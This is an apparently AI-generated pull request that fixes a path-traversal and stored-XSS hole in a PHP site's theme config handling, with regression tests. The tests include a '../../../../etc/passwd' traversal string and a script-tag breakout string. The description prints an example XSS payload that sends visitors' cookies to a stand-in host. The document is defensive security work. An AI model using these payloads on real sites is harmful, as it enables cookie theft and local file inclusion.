### PR TITLE
Fix unsanitized theme config value (path traversal + stored XSS)

### DIFF
--- a/src/index.php
+++ b/src/index.php
@@ -18,8 +18,15 @@ Config\apply_timezone($config);
 
 define('ROOT_URL', (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"]);
 // Config\ensure_explicit_theme() guarantees a renderable theme value on read,
-// so no runtime fallback/alias is needed here (see #291).
-define("THEME", (string) $config['theme']);
+// so no runtime fallback/alias is needed here (see #291). The value still
+// comes verbatim from the admin-editable config INI, though, and is used
+// both to build a require() path (THEME_DIR) and echoed raw into HTML on
+// every page view (THEME_URL, e.g. themes/2026/html.php's font preload
+// links) — sanitize_filename() (already used by Theme\part() for the same
+// reason) keeps it to a safe filename charset, closing both a path-traversal
+// primitive and a site-wide stored-XSS surface a stray HTML-breaking
+// character in `theme = ...` would otherwise open up.
+define("THEME", Theme\sanitize_filename((string) $config['theme']));
 define("THEME_DIR", ROOT_DIR . '/themes/' . THEME . '/');
 define("THEME_URL", 'themes/' . THEME . '/');
 

--- a/tests/Unit/ThemeTest.php
+++ b/tests/Unit/ThemeTest.php
@@ -165,6 +165,30 @@ class ThemeTest extends TestCase
         $this->assertSame('', sanitize_filename(''));
     }
 
+    // Regression: index.php defines THEME from the admin-editable config INI's
+    // `theme` value and uses it both to build a require() path (THEME_DIR) and
+    // echoes it raw into HTML on every page view (THEME_URL, e.g. font preload
+    // links in themes/2026/html.php) — sanitize_filename() is applied to that
+    // value specifically to close both a path-traversal primitive and a
+    // site-wide stored-XSS surface.
+
+    public function testSanitizeFilenameStripsPathTraversalSequences()
+    {
+        $sanitized = sanitize_filename('../../../../etc/passwd');
+        $this->assertStringNotContainsString('.', $sanitized);
+        $this->assertStringNotContainsString('/', $sanitized);
+        $this->assertStringContainsString('etc', $sanitized);
+        $this->assertStringContainsString('passwd', $sanitized);
+    }
+
+    public function testSanitizeFilenameNeutralizesHtmlBreakoutCharacters()
+    {
+        $sanitized = sanitize_filename('x"><script>alert(1)</script>');
+        $this->assertStringNotContainsString('"', $sanitized);
+        $this->assertStringNotContainsString('<', $sanitized);
+        $this->assertStringNotContainsString('>', $sanitized);
+    }
+
     // format_past_date
 
     public function testFormatPastDateYesterdayWhenJIs3AndDiffIs1()


### PR DESCRIPTION
## Summary

`src/index.php` builds the `THEME` constant directly from the admin-editable config INI's `theme` value with no sanitization:

```php
define("THEME", (string) $config['theme']);
define("THEME_DIR", ROOT_DIR . '/themes/' . THEME . '/');
define("THEME_URL", 'themes/' . THEME . '/');
```

Compare `Theme\part()` (`src/theme.php`), which explicitly calls `sanitize_filename()` on both its `$name`/`$dir` arguments before building a `require()` path the same way — `THEME` never gets that treatment even though `THEME_DIR` is used identically.

Worse, `THEME_URL` is echoed **raw** into HTML on every page view, unlike every other config-derived value on the same pages (which are all consistently escaped):

```php
// src/themes/2026/html.php
<link rel="preload" href="<?= ROOT_URL ?>/<?= THEME_URL ?>styles/fonts/public-sans-400-latin.woff2" ...>
```
```php
// src/theme/assets.php
$css_url = ROOT_URL . '/' . THEME_URL . 'styles/styles.css';
// ...
sprintf('<link rel="stylesheet" id="%1$s" href="%2$s?ver=%1$s">', $ver, $css_url)
```

**Impact:** two distinct issues from the same root cause, both materially different from "the admin can misconfigure their own settings":

1. **Path traversal**: `theme = ../../../../some/dir` changes the base directory `Theme\part()`'s `require THEME_DIR . "$dir$name.php"` resolves against — a local-file-inclusion primitive. Not directly RCE today (the only file-write surface, image/video upload, allowlists extensions), but a real gap that any future file-write feature would turn into one.
2. **Site-wide stored XSS**: `theme = x"><script>fetch('//evil.example/steal?c='+document.cookie)</script>` breaks out of the `href` attribute and injects a script tag that runs in **every visitor's** browser on every page load — not a self-inflicted admin issue, since it fires for the whole audience, not just the settings screen.

Both require the ability to set `site_config_ini` (today: admin login + CSRF via `/settings`), so no privilege boundary is crossed to *reach* it, but the resulting stored-XSS blast radius (every visitor, not just the admin) is a materially different severity than typical "admin can break their own config" issues, and it's clearly an oversight rather than a deliberate trust decision — every sibling value in the same files is escaped.

## Fix

Apply `sanitize_filename()` — already used by `Theme\part()` for the identical reason — to `THEME` at the single point it's defined, closing both vectors at their source rather than patching each downstream echo/require site individually.

## Test plan

- [x] Added `testSanitizeFilenameStripsPathTraversalSequences` / `testSanitizeFilenameNeutralizesHtmlBreakoutCharacters` (`tests/Unit/ThemeTest.php`) — `sanitize_filename()`'s existing, already-tested behavior applied to the specific attack payloads from this bug
- [x] `php -l src/index.php`
- [x] `vendor/bin/phpunit tests/Unit` — same pre-existing failures as on `main` (environment-only, e.g. missing `bin/upgrade` binary in this sandbox), no new failures
- [x] `vendor/bin/phpcs` clean on all changed files

---
_Generated by [Claude Code](https://claude.ai/code/session_01JvsktnWYMD9oqHPwtbJk7d)_